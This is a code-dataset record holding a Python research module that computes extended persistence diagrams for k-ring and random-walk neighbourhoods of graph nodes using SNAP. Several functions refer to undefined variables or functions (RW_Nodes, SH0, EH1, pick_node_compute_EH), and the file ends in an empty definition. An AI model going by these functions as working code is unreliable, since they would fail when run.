hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7321a67d543f21370a3bddffda3d1f202de2e4dc
| 30,102
|
py
|
Python
|
utils/compute_k_ring_dexPer_network.py
|
minghao92/LocalPer
|
c940dce63ff2583f836d4718ce43023fad310c05
|
[
"MIT"
] | null | null | null |
utils/compute_k_ring_dexPer_network.py
|
minghao92/LocalPer
|
c940dce63ff2583f836d4718ce43023fad310c05
|
[
"MIT"
] | null | null | null |
utils/compute_k_ring_dexPer_network.py
|
minghao92/LocalPer
|
c940dce63ff2583f836d4718ce43023fad310c05
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import snap
from multiprocessing import Pool
import numpy as np
import networkx as nx
from utils import EH_pairs
from utils import EH_pairs_1_ring
from functools import partial
def pick_node_compute_dexPer(Graph, k_ring, NId):
dexPer0 = {}
dexPer1 = {}
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
#print "Size %d, Depth %d" % (BfsTree_size, BfsTree_depth)
CnCom = snap.TIntV()
snap.GetNodeWcc(Graph, NId, CnCom)
SubGraph = snap.GetSubGraph(Graph, CnCom)
############################################################################################################
# Isolated nodes
if BfsTree_depth == 0:
return dexPer0, dexPer1
#############################################################################################
else:
heightVal = {}
NodeVec = snap.TIntV()
heightVal[NId] = 0
for dist in range (1, min(k_ring + 1, BfsTree_depth + 1)):
snap.GetNodesAtHop(SubGraph, NId, dist, NodeVec, False)
for item in NodeVec:
heightVal[item] = dist
Modified_Graph = snap.TUNGraph.New()
New_Node = SubGraph.GetMxNId()
for EI in SubGraph.Edges():
Src_idx = EI.GetSrcNId()
Dst_idx = EI.GetDstNId()
Src_dist = heightVal.get(Src_idx, -1)
Dst_dist = heightVal.get(Dst_idx, -1)
if not Modified_Graph.IsNode(Src_idx):
Modified_Graph.AddNode(Src_idx)
if not Modified_Graph.IsNode(Dst_idx):
Modified_Graph.AddNode(Dst_idx)
if Src_dist >= 0 and Dst_dist >= 0:
if Src_dist == Dst_dist:
#print(New_Nodes)
Modified_Graph.AddNode(New_Node)
Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
heightVal[New_Node] = Src_dist + 0.5
New_Node += 1
else:
Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
EH_computation = EH_pairs(Modified_Graph, heightVal)
return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_dexPer0(Graph, k_ring, NId):
dexPer0 = {}
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
#print "Size %d, Depth %d" % (BfsTree_size, BfsTree_depth)
CnCom = snap.TIntV()
snap.GetNodeWcc(Graph, NId, CnCom)
SubGraph = snap.GetSubGraph(Graph, CnCom)
############################################################################################################
# Isolated nodes
if BfsTree_depth == 0:
return dexPer0
#############################################################################################
else:
heightVal = {}
NodeVec = snap.TIntV()
heightVal[NId] = 0
for dist in range (1, min(k_ring + 1, BfsTree_depth + 1)):
snap.GetNodesAtHop(SubGraph, NId, dist, NodeVec, False)
for item in NodeVec:
heightVal[item] = dist
Modified_Graph = snap.TUNGraph.New()
New_Node = SubGraph.GetMxNId()
for EI in SubGraph.Edges():
Src_idx = EI.GetSrcNId()
Dst_idx = EI.GetDstNId()
Src_dist = heightVal.get(Src_idx, -1)
Dst_dist = heightVal.get(Dst_idx, -1)
if not Modified_Graph.IsNode(Src_idx):
Modified_Graph.AddNode(Src_idx)
if not Modified_Graph.IsNode(Dst_idx):
Modified_Graph.AddNode(Dst_idx)
if Src_dist >= 0 and Dst_dist >= 0:
if Src_dist == Dst_dist:
#print(New_Nodes)
Modified_Graph.AddNode(New_Node)
Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
heightVal[New_Node] = Src_dist + 0.5
New_Node += 1
else:
Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
EH_computation = EH_pairs(Modified_Graph, heightVal)
return EH_computation.get_SH0()
def pick_node_compute_RW_dexPer(Graph, num_steps, sample_rate, NId, max_num_walks_per_node):
dexPer0 = {}
dexPer1 = {}
nbrs = Graph.GetNI(NId).GetDeg()
###########################################################################################################
# Isolated node
if nbrs == 0:
return dexPer0, dexPer1
###########################################################################################################
num_walks = min(int(np.ceil(nbrs * sample_rate)), max_num_walks_per_node)
# print(num_walks)
visited_nodes = snap.TIntV()
visited_nodes.Add(NId)
#print("NodeID: " + str(NId))
node = NId
for j in range(num_steps):
NodeVec = snap.TIntV()
snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
new_node_id = np.random.choice(NodeVec, 1).item()
if new_node_id not in RW_Nodes:
RW_Nodes.Add(new_node_id)
node = new_node_id
SubGraph = snap.GetSubGraph(Graph, visited_nodes)
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(SubGraph, NId, True, True)
############################################################################################################
# Isolated nodes
if nbrs == 0:
return dexPer0, dexPer1
#############################################################################################
else:
heightVal = {}
NodeVec = snap.TIntV()
heightVal[NId] = 0
for dist in range (1, BfsTree_depth + 1):
snap.GetNodesAtHop(SubGraph, NId, dist, NodeVec, False)
for item in NodeVec:
heightVal[item] = dist
Modified_Graph = snap.TUNGraph.New()
New_Node = SubGraph.GetMxNId()
for EI in SubGraph.Edges():
Src_idx = EI.GetSrcNId()
Dst_idx = EI.GetDstNId()
Src_dist = heightVal.get(Src_idx, -1)
Dst_dist = heightVal.get(Dst_idx, -1)
if not Modified_Graph.IsNode(Src_idx):
Modified_Graph.AddNode(Src_idx)
if not Modified_Graph.IsNode(Dst_idx):
Modified_Graph.AddNode(Dst_idx)
if Src_dist >= 0 and Dst_dist >= 0:
if Src_dist == Dst_dist:
#print(New_Nodes)
Modified_Graph.AddNode(New_Node)
Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
heightVal[New_Node] = Src_dist + 0.5
New_Node += 1
else:
Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
EH_computation = EH_pairs(Modified_Graph, heightVal)
return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, sample_rate, k_ring, NId):
dexPer0 = {}
dexPer1 = {}
nbrs = Graph.GetNI(NId).GetDeg()
###########################################################################################################
# Isolated node
if nbrs == 0:
return SH0, EH1
###########################################################################################################
num_walks = int(np.ceil(nbrs * sample_rate))
visited_nodes = snap.TIntV()
visited_nodes.Add(NId)
#print("NodeID: " + str(NId))
NodeVec = snap.TIntV()
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
for dist in range (1, min(k_ring + 1, BfsTree_depth + 1)):
snap.GetNodesAtHop(Graph, NId, dist, NodeVec, False)
for item in NodeVec:
visited_nodes.Add(item)
SubGraph = snap.GetSubGraph(Graph, visited_nodes)
RW_Nodes = snap.TIntV()
RW_Nodes.Add(NId)
node = NId
for j in range(num_steps):
NodeVec = snap.TIntV()
snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
new_node_id = np.random.choice(NodeVec, 1).item()
if new_node_id not in RW_Nodes:
RW_Nodes.Add(new_node_id)
node = new_node_id
RW_Graph = snap.GetSubGraph(SubGraph, RW_Nodes)
############################################################################################################
heightVal = {}
NodeVec = snap.TIntV()
heightVal[NId] = 0
for dist in range (1, min(k_ring + 1, BfsTree_depth + 1)):
snap.GetNodesAtHop(RW_Graph, NId, dist, NodeVec, False)
for item in NodeVec:
heightVal[item] = dist
Modified_Graph = snap.TUNGraph.New()
New_Node = RW_Graph.GetMxNId()
for EI in RW_Graph.Edges():
Src_idx = EI.GetSrcNId()
Dst_idx = EI.GetDstNId()
Src_dist = heightVal.get(Src_idx, -1)
Dst_dist = heightVal.get(Dst_idx, -1)
if not Modified_Graph.IsNode(Src_idx):
Modified_Graph.AddNode(Src_idx)
if not Modified_Graph.IsNode(Dst_idx):
Modified_Graph.AddNode(Dst_idx)
if Src_dist >= 0 and Dst_dist >= 0:
if Src_dist == Dst_dist:
#print(New_Nodes)
Modified_Graph.AddNode(New_Node)
Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
heightVal[New_Node] = Src_dist + 0.5
New_Node += 1
else:
Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
EH_computation = EH_pairs(Modified_Graph, heightVal)
return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_RW_dexPer_steps(Graph, num_steps, NId):
dexPer0 = {}
dexPer1 = {}
nbrs = Graph.GetNI(NId).GetDeg()
###########################################################################################################
# Isolated node
if nbrs == 0:
return dexPer0, dexPer1
###########################################################################################################
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
RW_Nodes = snap.TIntV()
RW_Nodes.Add(NId)
node = NId
for j in range(num_steps):
NodeVec = snap.TIntV()
snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
new_node_id = np.random.choice(NodeVec, 1).item()
if new_node_id not in RW_Nodes:
RW_Nodes.Add(new_node_id)
node = new_node_id
RW_Graph = snap.GetSubGraph(Graph, RW_Nodes)
#############################################################################################
heightVal = {}
NodeVec = snap.TIntV()
heightVal[NId] = 0
for dist in range (1, BfsTree_depth + 1):
snap.GetNodesAtHop(RW_Graph, NId, dist, NodeVec, False)
for item in NodeVec:
heightVal[item] = dist
Modified_Graph = snap.TUNGraph.New()
New_Node = RW_Graph.GetMxNId()
for EI in RW_Graph.Edges():
Src_idx = EI.GetSrcNId()
Dst_idx = EI.GetDstNId()
Src_dist = heightVal.get(Src_idx, -1)
Dst_dist = heightVal.get(Dst_idx, -1)
if not Modified_Graph.IsNode(Src_idx):
Modified_Graph.AddNode(Src_idx)
if not Modified_Graph.IsNode(Dst_idx):
Modified_Graph.AddNode(Dst_idx)
if Src_dist >= 0 and Dst_dist >= 0:
if Src_dist == Dst_dist:
#print(New_Nodes)
Modified_Graph.AddNode(New_Node)
Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
heightVal[New_Node] = Src_dist + 0.5
New_Node += 1
else:
Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
EH_computation = EH_pairs(Modified_Graph, heightVal)
return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_RW_dexPer_steps_flyback(Graph, num_steps, NId, flyback_prob=0.15):
dexPer0 = {}
dexPer1 = {}
nbrs = Graph.GetNI(NId).GetDeg()
###########################################################################################################
# Isolated node
if nbrs == 0:
return dexPer0, dexPer1
###########################################################################################################
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
RW_Nodes = snap.TIntV()
RW_Nodes.Add(NId)
# node = Graph.GetNI(NId)
node = NId
for j in range(num_steps):
if np.random.uniform(size=1) <= flyback_prob:
node = NId
j -= 1
else:
NodeVec = snap.TIntV()
snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
new_node_id = np.random.choice(NodeVec, 1).item()
if new_node_id not in RW_Nodes:
RW_Nodes.Add(new_node_id)
node = new_node_id
RW_Graph = snap.GetSubGraph(Graph, RW_Nodes)
[BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(RW_Graph, NId, True, True)
############################################################################################################
heightVal = {}
NodeVec = snap.TIntV()
heightVal[NId] = 0
for dist in range (1, BfsTree_depth + 1):
snap.GetNodesAtHop(RW_Graph, NId, dist, NodeVec, False)
for item in NodeVec:
heightVal[item] = dist
Modified_Graph = snap.TUNGraph.New()
New_Node = RW_Graph.GetMxNId()
for EI in RW_Graph.Edges():
Src_idx = EI.GetSrcNId()
Dst_idx = EI.GetDstNId()
Src_dist = heightVal.get(Src_idx, -1)
Dst_dist = heightVal.get(Dst_idx, -1)
if not Modified_Graph.IsNode(Src_idx):
Modified_Graph.AddNode(Src_idx)
if not Modified_Graph.IsNode(Dst_idx):
Modified_Graph.AddNode(Dst_idx)
if Src_dist >= 0 and Dst_dist >= 0:
if Src_dist == Dst_dist:
#print(New_Nodes)
Modified_Graph.AddNode(New_Node)
Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
heightVal[New_Node] = Src_dist + 0.5
New_Node += 1
else:
Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
EH_computation = EH_pairs(Modified_Graph, heightVal)
return EH_computation.get_SH0(), EH_computation.get_EH1()
def dexPer_of_a_vertex(filename, k_ring, NId):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NId)
return [dexPer0, dexPer1]
def RW_dexPer_of_a_vertex(filename, num_steps, rate, NId):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
SH0, EH1 = pick_node_compute_RW_dexPer(Graph, num_steps, rate, NId)
return [dexPer0, dexPer1]
def RW_dexPer_of_a_vertex_in_kring(filename, num_steps, rate, k_ring, NId):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, NId)
return [dexPer0, dexPer1]
def RW_dexPer_of_a_vertex_steps(filename, num_steps, NId):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_steps(Graph, num_steps, NId)
return [dexPer0, dexPer1]
##############################################################################################
def dexPer_of_all_vertices(Graph, k_ring):
dexPer0_all = [[]] * Graph.GetNodes()
dexPer1_all = [[]] * Graph.GetNodes()
i = 0
for NI in Graph.Nodes():
NI_Id = NI.GetId()
if k_ring == 1:
EH_computation = EH_pairs_1_ring(Graph, NI_Id)
dexPer0 = EH_computation.get_SH0()
dexPer1 = EH_computation.get_EH1()
else:
dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def dexPer_of_all_vertices_dir(filename, k_ring):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
dexPer0_all, dexPer1_all = dexPer_of_all_vertices(Graph, k_ring)
return dexPer0_all, dexPer1_all
def dexPer0_of_all_vertices(Graph, k_ring):
dexPer0_all = [[]] * Graph.GetNodes()
i = 0
for NI in Graph.Nodes():
NI_Id = NI.GetId()
if k_ring == 1:
EH_computation = EH_pairs_1_ring(Graph, NI_Id)
dexPer0 = EH_computation.get_SH0()
else:
dexPer0 = pick_node_compute_dexPer0(Graph, k_ring, NI_Id)
dexPer0_all[i] = dexPer0
i += 1
return dexPer0_all
def dexPer_of_vertices_with_large_degree(Graph, k_ring, num_nodes):
num_nodes = min(Graph.GetNodes(), num_nodes)
dexPer0_all = [[]] * num_nodes
dexPer1_all = [[]] * num_nodes
i = 0
degree_seq = snap.TIntV()
snap.GetDegSeqV(Graph, degree_seq)
degree_seq.Sort()
degs = [item for item in degree_seq]
threshold = degs[-num_nodes]
for NI in Graph.Nodes():
if NI.GetDeg() >= threshold and i < num_nodes:
NI_Id = NI.GetId()
if k_ring == 1:
EH_computation = EH_pairs_1_ring(Graph, NI_Id)
dexPer0 = EH_computation.get_SH0()
dexPer1 = EH_computation.get_EH1()
else:
dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def dexPer_of_vertices_with_large_degree_percentage(Graph, k_ring, top_percentage):
num_nodes = int(Graph.GetNodes() * top_percentage)
dexPer0_all = [[]] * num_nodes
dexPer1_all = [[]] * num_nodes
i = 0
degree_seq = snap.TIntV()
snap.GetDegSeqV(Graph, degree_seq)
degree_seq.Sort()
degs = [item for item in degree_seq]
threshold = degs[-num_nodes]
for NI in Graph.Nodes():
if NI.GetDeg() >= threshold and i < num_nodes:
NI_Id = NI.GetId()
if k_ring == 1:
EH_computation = EH_pairs_1_ring(Graph, NI_Id)
dexPer0 = EH_computation.get_SH0()
dexPer1 = EH_computation.get_EH1()
else:
dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def dexPer_of_vertices_with_large_eigenvector_centrality(Graph, k_ring, num_nodes):
num_nodes = min(Graph.GetNodes(), num_nodes)
dexPer0_all = [[]] * num_nodes
dexPer1_all = [[]] * num_nodes
i = 0
eps = 1e-7
eigen_seq = snap.TIntFltH()
snap.GetEigenVectorCentr(Graph, eigen_seq)
eigens = [eigen_seq[item] for item in eigen_seq]
eigens = sorted(eigens)
threshold = eigens[-num_nodes]
for NI in Graph.Nodes():
NI_Id = NI.GetId()
if eigen_seq[NI_Id] >= (threshold - eps) and i < num_nodes:
if k_ring == 1:
EH_computation = EH_pairs_1_ring(Graph, NI_Id)
dexPer0 = EH_computation.get_SH0()
dexPer1 = EH_computation.get_EH1()
else:
dexPer0, dexPer1 = pick_node_compute_EH(Graph, k_ring, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def dexPer_of_vertices_with_large_eigenvector_centrality_percentage(Graph, k_ring, top_percentage):
num_nodes = int(Graph.GetNodes() * top_percentage)
dexPer0_all = [[]] * num_nodes
dexPer1_all = [[]] * num_nodes
i = 0
eps = 1e-7
eigen_seq = snap.TIntFltH()
snap.GetEigenVectorCentr(Graph, eigen_seq)
eigens = [eigen_seq[item] for item in eigen_seq]
eigens = sorted(eigens)
threshold = eigens[-num_nodes]
for NI in Graph.Nodes():
NI_Id = NI.GetId()
if eigen_seq[NI_Id] >= (threshold - eps) and i < num_nodes:
if k_ring == 1:
EH_computation = EH_pairs_1_ring(Graph, NI_Id)
dexPer0 = EH_computation.get_SH0()
dexPer1 = EH_computation.get_EH1()
else:
dexPer0, dexPer1 = pick_node_compute_EH(Graph, k_ring, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def dexPer_of_all_vertices_sample(Graph, k_ring, sample_rate):
dexPer0_all = []
dexPer1_all = []
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(int(np.ceil(Graph.GetNodes() * sample_rate))):
dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, Graph.GetRndNId(Rnd))
dexPer0_all.append(dexPer0)
dexPer1_all.append(dexPer1)
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices(Graph, num_steps, rate):
dexPer0_all = [[]] * Graph.GetNodes()
dexPer1_all = [[]] * Graph.GetNodes()
i = 0
for NI in Graph.Nodes():
NI_Id = NI.GetId()
dexPer0, dexPer1 = pick_node_compute_RW_dexPer(Graph, num_steps, rate, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_in_kring(Graph, num_steps, rate, k_ring):
dexPer0_all = []
dexPer1_all = []
for NI in Graph.Nodes():
NI_Id = NI.GetId()
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, NI_Id)
dexPer0_all.append(dexPer0)
dexPer1_all.append(dexPer1)
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps(Graph, num_steps):
dexPer0_all = [[]] * Graph.GetNodes()
dexPer1_all = [[]] * Graph.GetNodes()
i = 0
for NI in Graph.Nodes():
NI_Id = NI.GetId()
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_steps(Graph, num_steps, NI_Id)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps_flyback(Graph, num_steps, flyback_prob=0.15):
dexPer0_all = [[]] * Graph.GetNodes()
dexPer1_all = [[]] * Graph.GetNodes()
i = 0
for NI in Graph.Nodes():
NI_Id = NI.GetId()
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_steps_flyback(Graph, num_steps, NI_Id, flyback_prob=flyback_prob)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
i += 1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_in_kring_sample(Graph, num_steps, rate, k_ring, sample_rate):
sample_size = int(np.ceil(Graph.GetNodes() * sample_rate))
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, Graph.GetRndNId(Rnd))
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_in_kring_fixed_samplesize(Graph, num_steps, rate, k_ring, sample_size):
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, Graph.GetRndNId(Rnd))
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps_sample(Graph, num_steps, sample_rate):
sample_size = int(np.ceil(Graph.GetNodes() * sample_rate))
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_steps(Graph, num_steps, Graph.GetRndNId(Rnd))
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps_fixed_samplesize(Graph, num_steps, sample_size):
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_steps(Graph, num_steps, Graph.GetRndNId(Rnd))
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps_fixed_samplesize_flyback(Graph, num_steps, sample_size, flyback_prob):
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer_steps_flyback(Graph, num_steps, Graph.GetRndNId(Rnd), flyback_prob=flyback_prob)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def dexPer_of_all_vertices_fixed_samplesize(Graph, k_ring, sample_size):
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, Graph.GetRndNId(Rnd))
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps_sample_node_rate(Graph, num_steps, sample_rate, node_rate, max_num_walks_per_node):
Rnd = snap.TRnd(42)
Rnd.Randomize()
sample_size = int(np.ceil(Graph.GetNodes() * sample_rate))
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer(Graph, num_steps, node_rate, Graph.GetRndNId(Rnd), max_num_walks_per_node)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_steps_fixed_samplesize_node_rate(Graph, num_steps, sample_size, node_rate, max_num_walks_per_node):
dexPer0_all = [[]] * sample_size
dexPer1_all = [[]] * sample_size
Rnd = snap.TRnd(42)
Rnd.Randomize()
for i in range(sample_size):
dexPer0, dexPer1 = pick_node_compute_RW_dexPer(Graph, num_steps, node_rate, Graph.GetRndNId(Rnd), max_num_walks_per_node)
dexPer0_all[i] = dexPer0
dexPer1_all[i] = dexPer1
return dexPer0_all, dexPer1_all
def output_dexPer_of_a_vertex(Graph, k_ring, D0_output, D1_output, NId):
